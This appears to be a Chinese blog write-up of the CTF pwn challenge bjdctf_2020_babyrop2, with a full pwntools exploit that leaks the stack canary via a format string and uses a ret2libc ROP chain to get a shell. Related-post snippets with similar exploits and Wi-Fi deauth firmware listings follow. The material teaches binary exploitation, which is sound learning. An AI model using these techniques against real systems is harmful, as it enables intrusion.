BUUOJ PWN bjdctf_2020_babyrop2

最新推荐文章于 2022-10-24 21:02:05 发布
最新推荐文章于 2022-10-24 21:02:05 发布
阅读量194 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50287973/article/details/109643681
版权

开启的安全机制
在这里插入图片描述
main在这里插入图片描述
gift
在这里插入图片描述
利用格式化字符串泄露canary

vuln
在这里插入图片描述
栈溢出泄露libc
栈溢出执行system(“bin/sh\x00”)

scanf允许输入6字节,输入参数,输出偏移为6的地址,canary的偏移就为7
在这里插入图片描述
在这里插入图片描述
这样输入%7$p就可以泄露canary

EXP

from pwn import *
from LibcSearcher import LibcSearcher


p = remote("node3.buuoj.cn",27004)
elf = ELF("./bjdctf_2020_babyrop2")

puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
pop_rdi_ret = 0x0000000000400993
vuln_addr = elf.symbols["vuln"]
#leak canary
p.sendlineafter("I'll give u some gift to help u!\n","%7$p")
canary = int(p.recv(18),16)
#leak libc
payload = "a"* (0x20-8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
puts_addr = u64(p.recv(6).ljust(8,"\x00"))


libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")
#get shell
payload = "a" * (0x20 - 8) + p64(canary) + "a" * 8 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
p.sendlineafter("Pull up your sword and tell me u story!\n",payload)
p.interactive()
SakuraTrick
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1666
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 398
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 291
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
第二届 BJDCTF 2020 Pwn Writeup (出题人版)
HiTaQini
04-01 1868
最为第一届BJDCTF的参赛选手和本届比赛的二进制出题人+运维,真心祝愿BJDCTF越办越好!(说多了怕被打)
bjdctf_2020_babyrop2
z1r0的博客
12-10 338
bjdctf_2020_babyrop2 查看保护 给了一个格式化字符串漏洞函数和栈溢出。 保护开了canary,用格式化漏洞输出canary。接着就是64位下的ret2libc。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 26666) else:
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 学习和理解这些代码,可以帮助开发者深入掌握ARM7处理器上的PWM接口实现,以及如何在汇编和C语言之间...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
【BUUCTF】bjdctf_2020_babyrop2
m0_51251108的博客
12-30 360
【BUUCTF】bjdctf_2020_babyrop2 有canary ida看下程序 有格式化漏洞,但有6格宽度限制 有栈溢出 思路:这题靠格式化字符串漏洞泄露出canary的地址 然后栈溢出,ret2libc 泄露方法: 一次一次试过去,找到我们输入的位置的偏移 然后这题里偏移+1就是canary了 然后就能把canary带出来,canary每次运行都不一样 所以要实时接收 一个程序不同函数的canary好像都相同 特别提醒自己在接收环节的处理 exp: from pwn import*
bjdctf_2020_babyrop2(cannary格式化字符泄露)
weixin_61283545的博客
06-11 300
这道题的调试属实有问题。从这道题学到可以利用格式化字符串泄露canary 从调试泄露栈上地址可以很清晰看到bp上8位canary,在偏移为6时发现我们标记的6161aa,它的下8位就是canary。打映出来后接受canary时我们先用recvuntil(“0x”),int(p.recv(16),16)来接受。还有一点cannary在bp前8位值得注意...
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1472
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2564
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 431
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1242
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 488
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 403
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
[buuoj][极客大挑战 2019]Havefun
qq_42250840的博客
06-26 233
打开网址查看源码 发现一段php,看样子是要求get传递cat并且值为dog 构造?cat=dog 直接得flag
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值